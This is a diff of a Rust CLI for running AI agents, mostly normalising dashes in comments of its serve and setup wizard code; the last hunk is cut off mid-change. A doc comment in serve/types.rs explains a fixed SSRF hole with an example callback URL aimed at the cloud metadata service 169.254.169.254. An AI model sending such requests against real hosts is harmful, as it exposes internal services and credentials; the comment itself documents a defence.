@@ -583,7 +583,7 @@ mod tests {
 
     #[tokio::test]
     async fn fire_webhook_does_not_retry_a_permanent_4xx() {
-        // A 400 is a permanent rejection — exactly one attempt, no retries.
+        // A 400 is a permanent rejection - exactly one attempt, no retries.
         let (url, server) = fake_receiver(vec![400]).await;
         fire_webhook(
             reqwest::Client::new(),
@@ -773,8 +773,8 @@ mod tests {
         // Deterministically prove the loop reconnects: a daemon streams one event
         // per subscribe pass and closes; awaiting two events forces the loop
         // through consume_once → backoff → re-subscribe (its loop-back edge). A
-        // zero backoff keeps it prompt, but the `recv().await`s — not scheduler
-        // timing — are what gate the assertions, so this is platform-stable.
+        // zero backoff keeps it prompt, but the `recv().await`s - not scheduler
+        // timing - are what gate the assertions, so this is platform-stable.
         let dir = tempfile::tempdir().unwrap();
         let (control, server) = reconnecting_daemon(dir.path(), 2);
         let (state, mut rx) = state_with(control);

--- a/crates/leviath-cli/src/commands/serve/testutil.rs
+++ b/crates/leviath-cli/src/commands/serve/testutil.rs
@@ -8,7 +8,7 @@ use leviath_runtime::control_socket::{
 use tokio::io::{AsyncBufReadExt, AsyncWriteExt, BufReader};
 use tokio::task::JoinHandle;
 
-/// A control client pointing at an address with no daemon — used by tests that
+/// A control client pointing at an address with no daemon - used by tests that
 /// never exercise agent actions (read/websocket/polling/config paths).
 pub(super) fn no_daemon_client() -> ControlClient {
     ControlClient::new(control_id(std::path::Path::new("/no/such/daemon")))

--- a/crates/leviath-cli/src/commands/serve/tree.rs
+++ b/crates/leviath-cli/src/commands/serve/tree.rs
@@ -224,7 +224,7 @@ mod tests {
     // `runstate::list_runs()` reads the real on-disk runs directory (there's
     // no test-isolated override in this crate's test suite), so these tests
     // use unique run-id prefixes and only assert on their own entries, then
-    // clean up afterward -- the same convention already used by
+    // clean up afterward - the same convention already used by
     // `commands/run/worker.rs` and `commands/run/mod.rs`'s tests.
 
     struct RunCleanup<'a>(&'a [&'a str]);

--- a/crates/leviath-cli/src/commands/serve/types.rs
+++ b/crates/leviath-cli/src/commands/serve/types.rs
@@ -48,7 +48,7 @@ pub struct ServeArgs {
     ///
     /// **Off by default, because they are remote code execution by
     /// construction.** Adding an MCP server writes a `command` and `args` into
-    /// `~/.leviath/config.toml`, and Leviath then spawns exactly that — so any
+    /// `~/.leviath/config.toml`, and Leviath then spawns exactly that - so any
     /// token holder could run an arbitrary process, persistently, for every
     /// future run. The rest of the API can only run agents the user already
     /// installed; this one adds new executables to the machine.
@@ -57,7 +57,7 @@ pub struct ServeArgs {
 
     /// Restrict agent working directories to this root.
     ///
-    /// Without it, `POST /api/agents` accepts any `workdir` — including `/` —
+    /// Without it, `POST /api/agents` accepts any `workdir` - including `/` -
     /// so a token holder can point a tool-executing agent at the whole
     /// filesystem. Set this to the directory the API is meant to work in.
     #[arg(long)]
@@ -171,7 +171,7 @@ impl ServeLimits {
     /// model-supplied URL goes through.
     ///
     /// The URL arrives in a `POST /api/agents` body, is persisted, and is POSTed
-    /// to when the run finishes — from inside the trust boundary, and with
+    /// to when the run finishes - from inside the trust boundary, and with
     /// retries. Unchecked, `"callback_url": "http://169.254.169.254/…"` made the
     /// daemon a repeatable request primitive against the cloud metadata service
     /// and anything else on the local network, on behalf of a caller that

--- a/crates/leviath-cli/src/commands/serve/websocket.rs
+++ b/crates/leviath-cli/src/commands/serve/websocket.rs
@@ -12,7 +12,7 @@ pub(super) async fn ws_global(
     ws: WebSocketUpgrade,
 ) -> impl IntoResponse {
     // Subscribe before on_upgrade so the Receiver (not a Sender clone) is
-    // moved into the handler — that way when all external Senders drop the
+    // moved into the handler - that way when all external Senders drop the
     // channel becomes Closed and rx.recv() returns Err(Closed) immediately,
     // making that match arm reachable in tests.
     let rx = state.event_tx.subscribe();
@@ -93,7 +93,7 @@ mod tests {
 
     /// Minimal hand-rolled WebSocket client used to drive `handle_ws` end to
     /// end over a real TCP loopback connection. No `tokio-tungstenite` or
-    /// other WS crate is added as a dependency — this speaks just enough of
+    /// other WS crate is added as a dependency - this speaks just enough of
     /// RFC 6455 to perform the opening handshake and exchange text/close
     /// frames with axum's server-side WebSocket implementation.
     struct WsTestClient {
@@ -310,7 +310,7 @@ mod tests {
         // a JSON payload exceeding u16::MAX bytes, forcing the server's WS
         // frame to use the 8-byte extended-length encoding (0x7f) instead of
         // the 2-byte one (0x7e) that every other event in this file's tests
-        // is small enough to use -- exercising `recv_frame`'s `len == 127`
+        // is small enough to use - exercising `recv_frame`'s `len == 127`
         // branch.
         let state = test_state();
         let tx = state.event_tx.clone();
@@ -369,14 +369,14 @@ mod tests {
         let mut client = WsTestClient::connect(addr, "/ws/agents/run-match").await;
         tokio::time::sleep(std::time::Duration::from_millis(50)).await;
 
-        // Non-matching event first — should be filtered out and not sent.
+        // Non-matching event first - should be filtered out and not sent.
         tx.send(ServerEvent::Log {
             agent_id: "a".to_string(),
             run_id: "run-other".to_string(),
             line: "skip me".to_string(),
         })
         .unwrap();
-        // Matching event — should be relayed.
+        // Matching event - should be relayed.
         tx.send(ServerEvent::Log {
             agent_id: "a".to_string(),
             run_id: "run-match".to_string(),
@@ -592,7 +592,7 @@ mod tests {
             });
         }
 
-        // Drop the client — TCP FIN/RST is sent.
+        // Drop the client - TCP FIN/RST is sent.
         drop(client.stream);
 
         // Keep sending events so the biased select keeps trying the event
@@ -620,7 +620,7 @@ mod tests {
     /// 2. connecting a WS client so `handle_ws` is actively looping;
     /// 3. shutting the server down with graceful shutdown (drops AppState +
     ///    its Sender clone); and
-    /// 4. dropping the test-side sender — making the channel Closed so
+    /// 4. dropping the test-side sender - making the channel Closed so
     ///    rx.recv() returns Err(Closed) and handle_ws breaks.
     fn assert_closed_after_channel_closed(eof: Option<u8>) {
         assert_eq!(eof, None, "server should close after channel Closed");
@@ -652,7 +652,7 @@ mod tests {
         // Signal graceful shutdown: the server accepts no new connections and
         // drops its router (AppState), which drops the last Sender clone.
         let _ = shutdown_tx.send(());
-        // Wait for the server task to exit — at that point the channel is Closed.
+        // Wait for the server task to exit - at that point the channel is Closed.
         tokio::time::timeout(std::time::Duration::from_secs(5), handle)
             .await
             .expect("server did not shut down in time")
@@ -802,8 +802,8 @@ mod tests {
     /// exercises, instead of each test carrying its own inline copy.
     /// `llvm-cov` counts coverage per source line, not per logical match: with
     /// the match duplicated inline across tests that each construct only 1-5 of
-    /// the 7 `ServerEvent` variants, most arms of most copies read as never hit
-    /// -- even though every arm works, just not from that copy's test data. A
+    /// the 7 `ServerEvent` variants, most arms of most copies read as never hit -
+    /// even though every arm works, just not from that copy's test data. A
     /// single shared function means every arm only needs to be hit once, from
     /// any caller, to be covered.
     fn get_run_id(ev: &ServerEvent) -> &str {
@@ -977,7 +977,7 @@ mod tests {
 
         tokio::spawn(async move {
             let (stream, _) = listener.accept().await.unwrap();
-            // Set SO_LINGER to 0 — causes RST on close instead of FIN.
+            // Set SO_LINGER to 0 - causes RST on close instead of FIN.
             #[allow(deprecated)]
             stream.set_linger(Some(Duration::from_secs(0))).unwrap();
             // Close immediately (drop triggers RST).

--- a/crates/leviath-cli/src/commands/setup/catalog.rs
+++ b/crates/leviath-cli/src/commands/setup/catalog.rs
@@ -1,10 +1,10 @@
 //! The providers `lev setup` can configure, and how each one is configured.
 //!
-//! The old wizard walked every user through every provider in a fixed order,
-//! asking for four API keys whether or not they had them, then asked for a
-//! `default_provider` as free text with no validation - so a typo produced a
-//! config that only failed at the first agent run. This table replaces both:
-//! the wizard shows it as a pick-list, and the default-provider choice is a
+//! This table is what keeps the wizard a pick-list rather than a fixed march
+//! through every provider (asking for four API keys whether or not the user
+//! has them) ending in a free-text `default_provider` with no validation -
+//! where a typo produces a config that only fails at the first agent run. The
+//! wizard shows the table as a pick-list, and the default-provider choice is a
 //! radio over what was actually configured.
 //!
 //! Everything a provider needs to differ by lives here as data, so adding one
@@ -163,8 +163,8 @@ pub fn is_configured(config: &Config, id: &str) -> bool {
 /// Redact a credential for display.
 ///
 /// Delegates to `leviath_core::secrets::redact`, which keeps the **last** four
-/// characters. This used to show the *first eight* - a different answer from
-/// the HTTP logger's, and the wrong half to keep: API keys are structured at
+/// characters. Showing the *first eight* would give a different answer from
+/// the HTTP logger's, and keep the wrong half: API keys are structured at
 /// the front, so `sk-ant-a`, `sk-proj-` and `ghp_…` identify the issuer and, on
 /// a short token, expose a meaningful fraction of the value. A suffix is
 /// unstructured and just as good for "is this the key I think it is".
@@ -223,7 +223,7 @@ mod tests {
     #[test]
     fn the_default_provider_is_in_the_table() {
         // Otherwise a fresh config would name a provider the wizard can't
-        // configure, which is how the old free-text prompt went wrong.
+        // configure - which is exactly how a free-text prompt once went wrong.
         let config = Config::default();
         assert!(
             providers().iter().any(|p| p.id == config.default_provider),
@@ -304,11 +304,11 @@ mod tests {
 
     // ─── redact ─────────────────────────────────────────────────────────────
 
-    /// The wizard now shows the last four characters, matching the HTTP
-    /// logger. It used to show the first *eight* - a second answer to "how much
-    /// of a secret is safe to print", and the wrong half: API keys are
-    /// structured at the front, so `sk-ant-a` names the issuer and, on a short
-    /// token, is a meaningful fraction of the value.
+    /// The wizard shows the last four characters, matching the HTTP logger.
+    /// Showing the first *eight* would be a second answer to "how much of a
+    /// secret is safe to print", and the wrong half: API keys are structured
+    /// at the front, so `sk-ant-a` names the issuer and, on a short token, is
+    /// a meaningful fraction of the value.
     #[test]
     fn redact_hides_short_keys_entirely() {
         assert_eq!(redact(""), "****");

--- a/crates/leviath-cli/src/commands/setup/catalog.rs
+++ b/crates/leviath-cli/src/commands/setup/catalog.rs
@@ -2,7 +2,7 @@
 //!
 //! The old wizard walked every user through every provider in a fixed order,
 //! asking for four API keys whether or not they had them, then asked for a
-//! `default_provider` as free text with no validation — so a typo produced a
+//! `default_provider` as free text with no validation - so a typo produced a
 //! config that only failed at the first agent run. This table replaces both:
 //! the wizard shows it as a pick-list, and the default-provider choice is a
 //! radio over what was actually configured.
@@ -19,7 +19,7 @@ pub enum Credential {
     ApiKey,
     /// A base URL, with a working default.
     BaseUrl,
-    /// Nothing — the provider is enabled by selecting it. Claude Code
+    /// Nothing - the provider is enabled by selecting it. Claude Code
     /// authenticates through its own CLI.
     None,
 }
@@ -122,7 +122,7 @@ pub const OLLAMA_MAX_CONCURRENT_INFERENCES: usize = 1;
 /// Read a provider's currently-configured credential out of a config.
 ///
 /// Note `openrouter_api_key` and `ollama_base_url` sit at the top level of
-/// `Config` while the other three live under `[providers]` — a historical split
+/// `Config` while the other three live under `[providers]` - a historical split
 /// this function hides from everything else.
 pub fn stored_credential(config: &Config, id: &str) -> Option<String> {
     match id {
@@ -163,7 +163,7 @@ pub fn is_configured(config: &Config, id: &str) -> bool {
 /// Redact a credential for display.
 ///
 /// Delegates to `leviath_core::secrets::redact`, which keeps the **last** four
-/// characters. This used to show the *first eight* — a different answer from
+/// characters. This used to show the *first eight* - a different answer from
 /// the HTTP logger's, and the wrong half to keep: API keys are structured at
 /// the front, so `sk-ant-a`, `sk-proj-` and `ghp_…` identify the issuer and, on
 /// a short token, expose a meaningful fraction of the value. A suffix is
@@ -305,7 +305,7 @@ mod tests {
     // ─── redact ─────────────────────────────────────────────────────────────
 
     /// The wizard now shows the last four characters, matching the HTTP
-    /// logger. It used to show the first *eight* — a second answer to "how much
+    /// logger. It used to show the first *eight* - a second answer to "how much
     /// of a secret is safe to print", and the wrong half: API keys are
     /// structured at the front, so `sk-ant-a` names the issuer and, on a short
     /// token, is a meaningful fraction of the value.
@@ -329,7 +329,7 @@ mod tests {
         // Issue #115: a byte-based cut lands inside a multi-byte character and
         // panics.
         assert_eq!(redact("日本語日本語日本語"), "****語日本語");
-        // 3 characters but 9 bytes — a byte-length guard would call this "long"
+        // 3 characters but 9 bytes - a byte-length guard would call this "long"
         // and print the whole key.
         assert_eq!(redact("日本語"), "****");
         assert_eq!(redact("日本語日本語日本"), "****");

--- a/crates/leviath-cli/src/commands/setup/import/formats.rs
+++ b/crates/leviath-cli/src/commands/setup/import/formats.rs
@@ -2,7 +2,7 @@
 //! [`MCPServerConfig`]s.
 //!
 //! Everything here is a pure `&str -> Result<Vec<..>>` function. No path
-//! resolution, no filesystem, no `#[cfg]` — those live in the parent module —
+//! resolution, no filesystem, no `#[cfg]` - those live in the parent module -
 //! so every harness's format is unit-testable on every platform, including the
 //! ones whose config files could never exist there.
 //!
@@ -10,16 +10,16 @@
 //!
 //! Nine harnesses, four families:
 //!
-//! * **`mcpServers` object** — Claude Code (`~/.claude.json`, plus a nested
+//! * **`mcpServers` object** - Claude Code (`~/.claude.json`, plus a nested
 //!   `mcpServers` per project), `.mcp.json`, Claude Desktop, Cursor, Windsurf,
 //!   Gemini CLI. Entries are `{command, args, env}` or `{url, headers}`, with
 //!   Gemini adding `httpUrl` and Windsurf `serverUrl`.
-//! * **`servers` object** — VS Code, same entry shape with an explicit `type`.
-//! * **`mcp` object** — OpenCode, whose entries are tagged `local`/`remote` and
+//! * **`servers` object** - VS Code, same entry shape with an explicit `type`.
+//! * **`mcp` object** - OpenCode, whose entries are tagged `local`/`remote` and
 //!   whose `command` is an *array* (argv) rather than a string.
-//! * **`context_servers` object** — Zed, whose entry nests the launch under a
+//! * **`context_servers` object** - Zed, whose entry nests the launch under a
 //!   `command` object (`{path, args, env}`).
-//! * **`[mcp_servers]` table** — Codex, the one TOML source.
+//! * **`[mcp_servers]` table** - Codex, the one TOML source.
 //!
 //! Rather than nine near-identical structs, one tolerant entry parser accepts
 //! the union of field names and every wrapper normalises into it. Unknown
@@ -56,7 +56,7 @@ const SECRET_HINTS: [&str; 7] = [
 ///
 /// `${VAR}` and `$VAR` are references Leviath expands at connect time, so they
 /// are not secrets in the file; anything else under a credential-shaped key is.
-/// Deliberately conservative in one direction only — a false positive costs the
+/// Deliberately conservative in one direction only - a false positive costs the
 /// user one glance at a flagged row, a false negative silently copies a live
 /// token into a second file on disk.
 fn looks_like_inline_secret(key: &str, value: &str) -> bool {
@@ -107,7 +107,7 @@ fn string_list(value: Option<&serde_json::Value>) -> Vec<String> {
 }
 
 /// Whether an entry is switched off in its own harness. An explicitly disabled
-/// server should not be offered — the user already said no once.
+/// server should not be offered - the user already said no once.
 fn is_disabled(entry: &serde_json::Map<String, serde_json::Value>) -> bool {
     entry.get("enabled").and_then(|v| v.as_bool()) == Some(false)
         || entry.get("disabled").and_then(|v| v.as_bool()) == Some(true)
@@ -116,7 +116,7 @@ fn is_disabled(entry: &serde_json::Map<String, serde_json::Value>) -> bool {
 /// Parse one server entry from any of the JSON-shaped harnesses.
 ///
 /// Returns `None` when the entry is disabled, malformed, or describes neither a
-/// command nor a URL — an entry Leviath cannot connect to is not a candidate.
+/// command nor a URL - an entry Leviath cannot connect to is not a candidate.
 ///
 /// Precedence is URL over command. Several harnesses carry both (a stdio
 /// fallback alongside a hosted endpoint), and [`MCPServerConfig::resolve`]
@@ -137,7 +137,7 @@ pub fn parse_json_entry(name: &str, value: &serde_json::Value) -> Option<Candida
 
     let (command, mut args) = match command_field {
         Some(serde_json::Value::String(s)) => (Some(s.clone()), Vec::new()),
-        // OpenCode: `command: ["npx", "-y", "pkg"]` — head is the program.
+        // OpenCode: `command: ["npx", "-y", "pkg"]` - head is the program.
         Some(serde_json::Value::Array(_)) => {
             let argv = string_list(entry.get("command"));
             let mut it = argv.into_iter();
@@ -182,9 +182,9 @@ pub fn parse_json_entry(name: &str, value: &serde_json::Value) -> Option<Candida
 
     // A malformed `[[mcp_servers]]` entry is a hard error in `Config::load`, so
     // importing one would brick the whole config file rather than costing one
-    // server. Both shapes above are valid by construction — each sets exactly
+    // server. Both shapes above are valid by construction - each sets exactly
     // one of `command`/`url` and states its transport outright, which is
-    // precisely what `validate` checks — so there is no runtime check here to
+    // precisely what `validate` checks - so there is no runtime check here to
     // reject something that cannot be built. `every_candidate_validates` holds
     // the invariant instead, and would fail loudly if a future edit to this
     // function broke it.
@@ -214,7 +214,7 @@ fn parse_json_map(map: Option<&serde_json::Value>) -> Vec<Candidate> {
 ///
 /// Covers `.mcp.json`, Claude Desktop, Cursor, Windsurf, and Gemini CLI
 /// (`mcpServers`), VS Code (`servers`), OpenCode (`mcp`), and Zed
-/// (`context_servers`) — the key is the only thing that differs.
+/// (`context_servers`) - the key is the only thing that differs.
 pub fn parse_json_object(contents: &str, key: &str) -> anyhow::Result<Vec<Candidate>> {
     let root: serde_json::Value = serde_json::from_str(contents)?;
     Ok(parse_json_map(root.get(key)))
@@ -246,7 +246,7 @@ pub fn parse_claude_code(contents: &str) -> anyhow::Result<Vec<Candidate>> {
 
 /// Codex's `~/.codex/config.toml`, whose servers live in an `[mcp_servers]`
 /// table. Reuses the JSON entry parser by converting the TOML table through
-/// `serde_json::Value` — the field names are identical, and one tolerant entry
+/// `serde_json::Value` - the field names are identical, and one tolerant entry
 /// parser beats two that must be kept in step.
 pub fn parse_codex(contents: &str) -> anyhow::Result<Vec<Candidate>> {
     // Deserialize the TOML straight into a `serde_json::Value` rather than

--- a/crates/leviath-cli/src/commands/setup/import/mod.rs
+++ b/crates/leviath-cli/src/commands/setup/import/mod.rs
@@ -1,7 +1,7 @@
 //! Discovering MCP servers already configured in other agent harnesses.
 //!
 //! Someone installing Leviath has usually already wired up MCP servers
-//! somewhere else — Claude Code, Cursor, Codex, Zed. Making them retype each
+//! somewhere else - Claude Code, Cursor, Codex, Zed. Making them retype each
 //! one is busywork, and the entries are close enough in shape to convert
 //! mechanically, so `lev setup` offers to import them.
 //!
@@ -10,9 +10,9 @@
 //! Two halves, deliberately separated:
 //!
 //! * [`formats`] turns file *contents* into candidates. Pure, no filesystem, no
-//!   `#[cfg]` — every harness's format is testable on every platform, including
+//!   `#[cfg]` - every harness's format is testable on every platform, including
 //!   ones whose files could never exist there.
-//! * This module knows *where* those files live — the only platform-dependent
+//! * This module knows *where* those files live - the only platform-dependent
 //!   part. It takes its roots as an injected [`Roots`] rather than reading the
 //!   environment, so the whole table is testable against tempdirs, and the one
 //!   genuine per-OS branch is `#[cfg]`-gated in a single place, per the rule
@@ -82,9 +82,9 @@ impl Scan {
 ///
 /// Two config roots, not one, because the harnesses genuinely disagree. Claude
 /// Desktop and VS Code follow the OS convention (`~/Library/Application Support`
-/// on macOS, `%APPDATA%` on Windows, `~/.config` on Linux) — that is
+/// on macOS, `%APPDATA%` on Windows, `~/.config` on Linux) - that is
 /// [`Self::os_config`]. Zed and OpenCode use an XDG-style `~/.config` on macOS
-/// *as well as* Linux — that is [`Self::xdg_config`]. Collapsing them would
+/// *as well as* Linux - that is [`Self::xdg_config`]. Collapsing them would
 /// silently look in the wrong place for half the table on macOS.
 #[derive(Debug, Clone)]
 pub struct Roots {
@@ -125,7 +125,7 @@ fn xdg_config_root(home: &Path, os_config: &Path) -> PathBuf {
 
 /// Platform default for the XDG-style root, with no `$XDG_CONFIG_HOME` set.
 ///
-/// macOS and Linux both use `~/.config` here — that is the whole reason this
+/// macOS and Linux both use `~/.config` here - that is the whole reason this
 /// root is separate from `dirs::config_dir()`, which on macOS points at
 /// Application Support. Windows has no such convention, so tools that would use
 /// it there fall back to the OS config directory.
@@ -251,7 +251,7 @@ pub fn known_sources(roots: &Roots) -> Vec<Source> {
 //
 // The per-OS differences in *where* these files live turn out to be entirely
 // absorbed by `dirs::config_dir()`, which the caller supplies as `Roots.config`
-// — `~/Library/Application Support` on macOS, `%APPDATA%` on Windows,
+// - `~/Library/Application Support` on macOS, `%APPDATA%` on Windows,
 // `~/.config` on Linux. Both vendors below put their file at the same relative
 // path under it on all three, so no `#[cfg]` is needed here. Writing out three
 // identical arms would only claim a difference that does not exist; if one
@@ -281,7 +281,7 @@ fn parse(layout: Layout, contents: &str) -> anyhow::Result<Vec<Candidate>> {
 
 /// Read and parse every known source that exists.
 ///
-/// Sources whose path does not exist are omitted entirely — on a clean machine
+/// Sources whose path does not exist are omitted entirely - on a clean machine
 /// this returns nothing and the wizard's import step is one line of text.
 ///
 /// Anything that *does* exist is kept even when it cannot be read or parsed,
@@ -312,7 +312,7 @@ pub fn scan(roots: &Roots) -> Vec<Scan> {
 /// anything is wrong. Saying so beats a raw `expected value at line 3 column 1`.
 fn describe_parse_error(source: &Source, error: &anyhow::Error) -> String {
     if source.allows_comments {
-        format!("{error} — this file may use comments, which aren't supported")
+        format!("{error} - this file may use comments, which aren't supported")
     } else {
         error.to_string()
     }
@@ -383,7 +383,7 @@ mod tests {
 
     #[test]
     fn known_sources_are_rooted_in_the_injected_directories() {
-        // Nothing may reach past the roots it was handed -- that is what keeps
+        // Nothing may reach past the roots it was handed - that is what keeps
         // the scan testable and keeps it from wandering the real home dir.
         let dir = tempfile::tempdir().unwrap();
         let roots = roots_in(dir.path());
@@ -445,7 +445,7 @@ mod tests {
 
     #[test]
     fn roots_new_falls_back_to_the_platform_default_without_xdg_config_home() {
-        // An empty value counts as unset -- an exported-but-blank variable is
+        // An empty value counts as unset - an exported-but-blank variable is
         // not a directory anyone meant to point at.
         for value in [None, Some("")] {
             temp_env::with_var("XDG_CONFIG_HOME", value, || {

--- a/crates/leviath-cli/src/commands/setup/input.rs
+++ b/crates/leviath-cli/src/commands/setup/input.rs
@@ -2,7 +2,7 @@
 //!
 //! One entry point, [`Wizard::handle_key`], split into a text-editing mode and
 //! a navigation mode. Editing takes priority: while a field is open, letters
-//! are letters, so `q` types a `q` rather than quitting — losing a
+//! are letters, so `q` types a `q` rather than quitting - losing a
 //! half-entered API key to a quit shortcut would be a genuinely bad way to find
 //! out about modal input.
 
@@ -104,7 +104,7 @@ impl Wizard {
 
     /// `Enter`: open an editor, or advance.
     ///
-    /// A screen with nothing to type into — a toggle, a choice, a list — falls
+    /// A screen with nothing to type into - a toggle, a choice, a list - falls
     /// through to "next screen" rather than doing nothing at all, so Enter is
     /// always the key that moves forward.
     fn activate(&mut self) -> Action {
@@ -273,7 +273,7 @@ impl Wizard {
     /// `o`: open the current provider's signup page.
     ///
     /// The opener is a field rather than a direct call so tests never launch a
-    /// real browser — `lev dash` learned that the hard way when a unit test
+    /// real browser - `lev dash` learned that the hard way when a unit test
     /// opened one.
     fn open_signup_page(&mut self) {
         let url = match self.step {

--- a/crates/leviath-cli/src/commands/setup/mod.rs
+++ b/crates/leviath-cli/src/commands/setup/mod.rs
@@ -1,4 +1,4 @@
-//! `lev setup` — the guided path from "just installed Leviath" to "ready to run
+//! `lev setup` - the guided path from "just installed Leviath" to "ready to run
 //! an agent".
 //!
 //! The previous version was nine `print!`/`read_line` prompts in a fixed order:
@@ -15,18 +15,18 @@
 //!
 //! ## Shape
 //!
-//! * [`state`] — what step we're on and what's been chosen. Pure data.
-//! * [`input`] — key handling.
-//! * [`render`] — drawing.
-//! * [`plan`] — the decisions as plain data, and the only code that writes.
-//! * [`catalog`] — which providers exist and how each is configured.
-//! * [`import`] — MCP servers found in other tools.
-//! * [`verify`] — proving a credential works.
+//! * [`state`] - what step we're on and what's been chosen. Pure data.
+//! * [`input`] - key handling.
+//! * [`render`] - drawing.
+//! * [`plan`] - the decisions as plain data, and the only code that writes.
+//! * [`catalog`] - which providers exist and how each is configured.
+//! * [`import`] - MCP servers found in other tools.
+//! * [`verify`] - proving a credential works.
 //!
 //! The terminal is a *front-end*, not the feature: everything it collects lands
 //! in a [`plan::SetupPlan`], and `--non-interactive` builds the same struct
 //! from flags. A future mobile or web host would be a third builder with
-//! nothing downstream changing — which is why none of the platform-shaped parts
+//! nothing downstream changing - which is why none of the platform-shaped parts
 //! (scanning a home directory, taking over a TTY) are prescribed anywhere but
 //! here.
 
@@ -118,8 +118,8 @@ pub struct SetupEnv {
     pub opener: leviath_mcp::BrowserOpener,
 }
 
-// The real `SetupEnv` -- the user's actual home, a real `std::env` lookup, and
-// a real browser -- is built in the binary, where those leaves belong. Nothing
+// The real `SetupEnv` - the user's actual home, a real `std::env` lookup, and
+// a real browser - is built in the binary, where those leaves belong. Nothing
 // in the library reaches the real environment, so no test can either.
 
 /// The non-interactive arm: apply flags to the config on disk and save.
@@ -197,7 +197,7 @@ fn apply_flags(config: &mut Config, args: &SetupArgs) {
 ///
 /// The base config comes from reading the *file*, deliberately not from
 /// `Config::load()`: `load` folds `$ANTHROPIC_API_KEY` and friends in, and the
-/// old wizard re-serialized the whole struct — quietly writing into
+/// old wizard re-serialized the whole struct - quietly writing into
 /// `~/.leviath/config.toml` a key the user had chosen to keep in their
 /// environment. Those are tracked separately and shown as such.
 pub fn build_wizard(env: &SetupEnv) -> Wizard {
@@ -615,7 +615,7 @@ mod tests {
         let dir = tempfile::tempdir().unwrap();
         let mut wizard = build_wizard(&env_in(dir.path()));
         let mut terminal = test_terminal();
-        // A tick with no input, then save -- covering the poll-timeout path.
+        // A tick with no input, then save - covering the poll-timeout path.
         let mut events = TestEventSource::new_with_nones(vec![
             None,
             Some(key_with(KeyCode::Char('s'), KeyModifiers::CONTROL)),

--- a/crates/leviath-cli/src/commands/setup/plan.rs
+++ b/crates/leviath-cli/src/commands/setup/plan.rs
@@ -7,8 +7,8 @@
 //! a future mobile or web host would build it a third way with nothing
 //! downstream changing.
 //!
-//! Keeping it separate also means the interesting logic — what actually
-//! changes, and what to warn about — is testable without a terminal.
+//! Keeping it separate also means the interesting logic - what actually
+//! changes, and what to warn about - is testable without a terminal.
 
 use std::path::{Path, PathBuf};
 
@@ -62,7 +62,7 @@ pub fn apply(plan: &SetupPlan, config_path: &Path, agents_dir: &Path) -> anyhow:
 /// review screen. Empty means nothing would change.
 ///
 /// Credentials are described as "set" / "changed" / "cleared" and never
-/// printed — the review screen is exactly the moment a shoulder-surfer is
+/// printed - the review screen is exactly the moment a shoulder-surfer is
 /// looking, and a key the user cannot read back is not a real loss when the
 /// wizard just verified it works.
 pub fn changes(before: &Config, plan: &SetupPlan) -> Vec<String> {

--- a/crates/leviath-cli/src/commands/setup/render.rs
+++ b/crates/leviath-cli/src/commands/setup/render.rs
@@ -3,7 +3,7 @@
 //! One `draw` per frame, laid out as a fixed header (step breadcrumb), a body
 //! that varies per step, and a footer (message line plus key hints), with an
 //! optional help overlay on top. Every function takes `&Wizard` and produces
-//! widgets — no state changes here, so a render can never be the reason
+//! widgets - no state changes here, so a render can never be the reason
 //! something moved.
 
 use ratatui::{
@@ -228,7 +228,7 @@ fn draw_provider_detail(frame: &mut Frame, area: Rect, wizard: &Wizard) {
             ]));
             if let Some(var) = row.from_env {
                 lines.push(Line::from(Span::styled(
-                    format!("Supplied by ${var} — it will not be written to the config."),
+                    format!("Supplied by ${var} - it will not be written to the config."),
                     Style::default().fg(C_WARN),
                 )));
             }
@@ -712,7 +712,7 @@ mod tests {
         w.enter(Step::ProviderDetail);
 
         let hidden = rendered(&w);
-        // Last four characters, not the first eight — see `catalog::redact`.
+        // Last four characters, not the first eight - see `catalog::redact`.
         assert!(hidden.contains("****here"), "{hidden}");
         assert!(
             !hidden.contains("sk-ant-s"),
@@ -797,7 +797,7 @@ mod tests {
         assert!(rendered(&w).contains("2 models"));
 
         w.providers[0].outcome = crate::commands::setup::verify::Outcome::Failed {
-            message: "rejected — check the key".into(),
+            message: "rejected - check the key".into(),
         };
         assert!(rendered(&w).contains("rejected"));
     }
@@ -945,7 +945,7 @@ mod tests {
         w.providers[0].selected = true;
         w.providers[0].value = "sk-ant-x".to_string();
         w.providers[0].outcome = crate::commands::setup::verify::Outcome::Failed {
-            message: "rejected — check the key".into(),
+            message: "rejected - check the key".into(),
         };
         w.enter(Step::Review);
 

--- a/crates/leviath-cli/src/commands/setup/state.rs
+++ b/crates/leviath-cli/src/commands/setup/state.rs
@@ -1,7 +1,7 @@
 //! The wizard's state: what step we're on, what's been chosen, and how a
 //! choice turns back into a [`SetupPlan`].
 //!
-//! Deliberately free of drawing and of key handling — those are `render` and
+//! Deliberately free of drawing and of key handling - those are `render` and
 //! `input`. Everything here is ordinary data and pure transitions, so the whole
 //! flow is testable without a terminal.
 
@@ -249,7 +249,7 @@ impl Wizard {
     ///
     /// `base` must come from reading the file, not from `Config::load()`:
     /// `load` folds `$ANTHROPIC_API_KEY` and friends into the struct, and the
-    /// old wizard then re-serialized the whole thing — silently writing a key
+    /// old wizard then re-serialized the whole thing - silently writing a key
     /// the user had deliberately kept in their environment into
     /// `~/.leviath/config.toml`. Environment-supplied credentials are tracked
     /// separately in `env_only` and shown as such.
@@ -1034,7 +1034,7 @@ pub(super) mod tests {
     #[test]
     fn a_key_that_lives_only_in_the_environment_is_shown_and_never_written() {
         // The bug this closes: `Config::load` folds env keys into the struct,
-        // and the old wizard re-serialized the whole thing -- silently writing
+        // and the old wizard re-serialized the whole thing - silently writing
         // a key the user deliberately kept in their environment into
         // ~/.leviath/config.toml.
         let dir = tempfile::tempdir().unwrap();
@@ -1486,7 +1486,7 @@ pub(super) mod tests {
     async fn a_late_reply_refills_the_model_picker() {
         // Moving straight from a credential into Defaults gets there before the
         // check comes back, so the picker was built from an empty model list
-        // and stayed that way -- caught by driving the real TUI against a live
+        // and stayed that way - caught by driving the real TUI against a live
         // API key.
         let dir = tempfile::tempdir().unwrap();
         let mut wizard = test_wizard(dir.path());
@@ -1688,7 +1688,7 @@ pub(super) mod tests {
         // Regression: the default used to be re-picked only when an arrow key
         // moved the provider choice. With Ollama the sole selection it is
         // already at index 0, no arrow is ever pressed, and the limit stayed at
-        // the hosted-API default of 8 -- caught by driving the real TUI.
+        // the hosted-API default of 8 - caught by driving the real TUI.
         let dir = tempfile::tempdir().unwrap();
         let mut wizard = test_wizard(dir.path());
         let ollama = wizard

--- a/crates/leviath-cli/src/commands/setup/state.rs
+++ b/crates/leviath-cli/src/commands/setup/state.rs
@@ -1034,8 +1034,8 @@ pub(super) mod tests {
     #[test]
     fn a_key_that_lives_only_in_the_environment_is_shown_and_never_written() {
         // The bug this closes: `Config::load` folds env keys into the struct,
